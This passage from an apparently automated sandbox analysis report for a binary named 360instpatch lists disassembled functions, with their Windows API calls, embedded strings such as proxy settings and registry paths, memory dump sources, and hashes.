                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FocusWindow$H_prolog3ItemMessageSendTextVisible_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1096848440-0
                                                                                                                                                                                                              • Opcode ID: 7cb2dc3c61cebf094ae3c02bb450965d37f413399f277c8e71abf6d04de435f5
                                                                                                                                                                                                              • Instruction ID: 8d2611fa2655b0e380b7a02c50b29ad472c3316cf3b88718762c1716072ea114
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cb2dc3c61cebf094ae3c02bb450965d37f413399f277c8e71abf6d04de435f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41517C71900209AFDB20EBA4DC46BFEB7F4FF24704F104569E516A7291EF34AA48CB61
                                                                                                                                                                                                              Function 6BF3ABF1 Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 6BF3ABF7
                                                                                                                                                                                                                • Part of subcall function 6BF3EF97: TlsGetValue.KERNEL32(?,6BF3F123,?,6BF3E348,00000042,0000083F,00000002,00000000), ref: 6BF3EFA0
                                                                                                                                                                                                                • Part of subcall function 6BF3EF97: __decode_pointer.LIBCMT ref: 6BF3EFB2
                                                                                                                                                                                                                • Part of subcall function 6BF3EF97: TlsSetValue.KERNEL32(00000000,6BF3E348,00000042,0000083F,00000002,00000000), ref: 6BF3EFC1
                                                                                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 6BF3AC02
                                                                                                                                                                                                                • Part of subcall function 6BF3EF77: TlsGetValue.KERNEL32(?,?,6BF3AC07,00000000), ref: 6BF3EF85
                                                                                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 6BF3AC15
                                                                                                                                                                                                                • Part of subcall function 6BF3EFCB: __decode_pointer.LIBCMT ref: 6BF3EFDC
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 6BF3AC1E
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 6BF3AC25
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BF3AC2B
                                                                                                                                                                                                              • __freefls@4.LIBCMT ref: 6BF3AC4B
                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6BF3AC5E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1925773019-0
                                                                                                                                                                                                              • Opcode ID: 40ec949d25fb8d6f77e79c43998d645628c83bd8833170629d6f239666e5da4d
                                                                                                                                                                                                              • Instruction ID: a9a8aeafb5be3c3fc591e59bffaa8458cd240c958b3f1929e812f2266a834d7e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40ec949d25fb8d6f77e79c43998d645628c83bd8833170629d6f239666e5da4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B014B37420222AFCF08AF72C549A4E3BE9AF4539871584A5E945C7271DB3EC846CAF1
                                                                                                                                                                                                              Function 00B14680 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 388COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B146A1
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(?,?,00000000,?,00000003), ref: 00B146B3
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00B146E3
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000008,?,?,?,00004000), ref: 00B146F3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastSize_malloc_memset
                                                                                                                                                                                                              • String ID: INIT$PE
                                                                                                                                                                                                              • API String ID: 942205088-3949469810
                                                                                                                                                                                                              • Opcode ID: d7e91bc7e1da3f7450970e91e881f8f3922a7eb3493156fd48e91402c9265c53
                                                                                                                                                                                                              • Instruction ID: 3ec76ecfc6c61f84479a29324597927788b294fd2094adc1005760ffc1f5ba23
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7e91bc7e1da3f7450970e91e881f8f3922a7eb3493156fd48e91402c9265c53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FE1D0B1A083419BDB20DF24D841BAB77E4FF95704F8449ADF9989B381E770D984C792
                                                                                                                                                                                                              Function 6BF05B20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 189COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF05D5B
                                                                                                                                                                                                                • Part of subcall function 6BF26BE8: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,6BF05BD5,customproxytype,?,AA5945B3), ref: 6BF26C13
                                                                                                                                                                                                                • Part of subcall function 6BF26CC7: RegSetValueExW.KERNEL32(?,00000000,00000000,00000004,?,00000004,?,6BF05B99,proxytype,00000001,proxytype,?,AA5945B3), ref: 6BF26CEB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CountQueryTick
                                                                                                                                                                                                              • String ID: customhttp$customproxytype$customsocks$ieproxy$proxytype
                                                                                                                                                                                                              • API String ID: 3766178726-1816664922
                                                                                                                                                                                                              • Opcode ID: 706c04d091765467f2b2c23c35a14ea14f08f7078e6257773236ce710ead4d6a
                                                                                                                                                                                                              • Instruction ID: ee64905d46bfb553f8aa679ad25f4d5e9c9c8f492a410d5017f5e84acdac6708
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 706c04d091765467f2b2c23c35a14ea14f08f7078e6257773236ce710ead4d6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9971B773904649AFDB24CF64C8919DEB3F8FF04314F50852AE616D62B0EB78A644CF51
                                                                                                                                                                                                              Function 00B48C9F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B48CA6
                                                                                                                                                                                                                • Part of subcall function 00B572A6: __EH_prolog3.LIBCMT ref: 00B572C5
                                                                                                                                                                                                                • Part of subcall function 00B572A6: _memset.LIBCMT ref: 00B572EC
                                                                                                                                                                                                                • Part of subcall function 00B573D5: __EH_prolog3.LIBCMT ref: 00B573F4
                                                                                                                                                                                                                • Part of subcall function 00B573D5: _memset.LIBCMT ref: 00B57422
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00003001), ref: 00B48E38
                                                                                                                                                                                                                • Part of subcall function 00B2AFB8: __EH_prolog3.LIBCMT ref: 00B2AFBF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3$_memset$ExchangeInterlocked
                                                                                                                                                                                                              • String ID: .dir$360Installer$\Setup.ini$\custom_wnd.ini
                                                                                                                                                                                                              • API String ID: 3606139519-1812597268
                                                                                                                                                                                                              • Opcode ID: 9ee57938275ea3fd7e654f3a843f89af7be894d12132eb973d743433cff2df91
                                                                                                                                                                                                              • Instruction ID: accdb56b60a6b6222bc59d527d20ff32ff92c27d93bb57628657b030895beab2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ee57938275ea3fd7e654f3a843f89af7be894d12132eb973d743433cff2df91
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47518C71900249ABCB04EBE4D896EFEB7F8AF15300F1405A9F126A72D2DF745A48DB61
                                                                                                                                                                                                              Function 6BF17A33 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.%3d] Connecting to %s:%d, xrefs: 6BF17BDA
                                                                                                                                                                                                              • [%d.%3d] %s(%s) Connecting to %s:%d, xrefs: 6BF17B2B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$H_prolog3
                                                                                                                                                                                                              • String ID: [%d.%3d] %s(%s) Connecting to %s:%d$[%d.%3d] Connecting to %s:%d
                                                                                                                                                                                                              • API String ID: 49165580-3150661452
                                                                                                                                                                                                              • Opcode ID: 5db5036f2b47b2ad1c9616e390f94c1a965d08b054cc27b229220d00e94ee7fd
                                                                                                                                                                                                              • Instruction ID: cdb79e9543d65b7b2fdc19e97bd8c1e4b581197a1e1141fd70bb243783566c36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5db5036f2b47b2ad1c9616e390f94c1a965d08b054cc27b229220d00e94ee7fd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E151CFB2204601DFD714CFB4C985BAAB7E9FF44704F14885DE45A8B2B0EB78E980CB61
                                                                                                                                                                                                              Function 6BF53030 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF5307C
                                                                                                                                                                                                              • SHGetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,?,?,?,?,00000400), ref: 6BF530A5
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF53152
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 6BF5317A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$Valuelstrcmpi
                                                                                                                                                                                                              • String ID: Software\360Safe\Liveup$mid
                                                                                                                                                                                                              • API String ID: 999496690-2395435937
                                                                                                                                                                                                              • Opcode ID: ea35972ed17e5cf134bf2ffe6ea7a0a253abfb85cdf437dad52cd97dde84df6c
                                                                                                                                                                                                              • Instruction ID: bb3a2ad7afd50df2f971487ce19895dcb5610fc2693a22f69b35152a78eb3ca7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea35972ed17e5cf134bf2ffe6ea7a0a253abfb85cdf437dad52cd97dde84df6c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5841D4739083898BE335CB38C851BFB77E8AFA5708F04499DD58A87150E7399519CBA2
                                                                                                                                                                                                              Function 6BF3074A Relevance: 10.6, APIs: 7, Instructions: 106networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000276D,?,?,?,?,?,?,?), ref: 6BF30772
                                                                                                                                                                                                              • socket.WS2_32(00000002,?,00000000), ref: 6BF307B5
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?), ref: 6BF307C0
                                                                                                                                                                                                                • Part of subcall function 6BF304A4: WSAAsyncSelect.WS2_32(?,00000000,?,?), ref: 6BF304C4
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,00000010,?,00000000,?,?,?,?,?,?,?), ref: 6BF307E4
                                                                                                                                                                                                              • WSAAsyncSelect.WS2_32(?,00000000,?,0000003F), ref: 6BF30811
                                                                                                                                                                                                              • htonl.WS2_32(00000000), ref: 6BF3082C
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 6BF30838
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$AsyncSelect$htonlhtonssocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3031483187-0
                                                                                                                                                                                                              • Opcode ID: 0500960952f9bc04e8f84c1184957ba49db5efa24788b4058726a94e638f31ad
                                                                                                                                                                                                              • Instruction ID: 23c716a1b272c044a484a7d7fe124960b9e68a335df196d627da9adfbdb8f372
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0500960952f9bc04e8f84c1184957ba49db5efa24788b4058726a94e638f31ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31DE33610715ABDB109F78C849BAE77B9AF49B60B10096BE956D62B0D7B8C9008BD0
                                                                                                                                                                                                              Function 6BF1C2C7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterH_prolog3Leave
                                                                                                                                                                                                              • String ID: MSCF
                                                                                                                                                                                                              • API String ID: 4250467438-1646999414
                                                                                                                                                                                                              • Opcode ID: 3aa7a19d6911f8041bbb8bf5f65d943ea2981a46a3aea25bb6789a0ec0fe896b
                                                                                                                                                                                                              • Instruction ID: 85ad3bb0a19dee39523c75c66c6008c6b5aba3526d3b9e3fa7c4a13d8815996e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3aa7a19d6911f8041bbb8bf5f65d943ea2981a46a3aea25bb6789a0ec0fe896b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6631353350C601DBC2249B7998816ABB3E5EF82728F100C7ED46A8B2B0CF3D94568652
                                                                                                                                                                                                              Function 6BEE8270 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(?,00000000), ref: 6BEE82A2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] DiskFile set file valid data failed file:%s %d, xrefs: 6BEE833A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileSize
                                                                                                                                                                                                              • String ID: [%d.] DiskFile set file valid data failed file:%s %d
                                                                                                                                                                                                              • API String ID: 3433856609-2029010613
                                                                                                                                                                                                              • Opcode ID: b583d05743ed98ae39d234385aed6081dacc230810032c988c3c820775cf2054
                                                                                                                                                                                                              • Instruction ID: 14ad9dec95c0980a3c3061b3aa68359c381e894295b25ad80f289f8e3d678e17
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b583d05743ed98ae39d234385aed6081dacc230810032c988c3c820775cf2054
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D219672524600EFDB408B74CC44B6F77B9FF1672AF644559E412D2650D778E916CB30
                                                                                                                                                                                                              Function 6BEFB15A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEFB199
                                                                                                                                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?,?,?,?,?,00000000,000007FE,?), ref: 6BEFB1D8
                                                                                                                                                                                                              • GetFileVersionInfoW.VERSION(000007FE,00000000,00000000,?,?,?,?,?,?,?,00000000,000007FE,?), ref: 6BEFB1F3
                                                                                                                                                                                                              • VerQueryValueW.VERSION(?,6BF6419C,?,?,000007FE,00000000,00000000,?,?,?,?,?,?,?,00000000,000007FE), ref: 6BEFB216
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileInfoVersion$QuerySizeValue_memset
                                                                                                                                                                                                              • String ID: %d.%d.%d.%d$%s\%s
                                                                                                                                                                                                              • API String ID: 3017621270-4009587522
                                                                                                                                                                                                              • Opcode ID: a9ed79ab9e72ff2a09bd5e5a041c0fb13cfa45c8dfb6a85bbcda311f82d22dc6
                                                                                                                                                                                                              • Instruction ID: 4dfd75b6a11827daff6ebddcbc27e3a53b2882b7b2eaa4682bf7c05d77bab295
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9ed79ab9e72ff2a09bd5e5a041c0fb13cfa45c8dfb6a85bbcda311f82d22dc6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE2194B2910158EAEB50DB78CC45EAE73ECAF05604F1084A6BA05D7151EB7CDA858BB4
                                                                                                                                                                                                              Function 00B64A8C Relevance: 10.6, APIs: 7, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetClientRect.USER32(00000005,?), ref: 00B64AAC
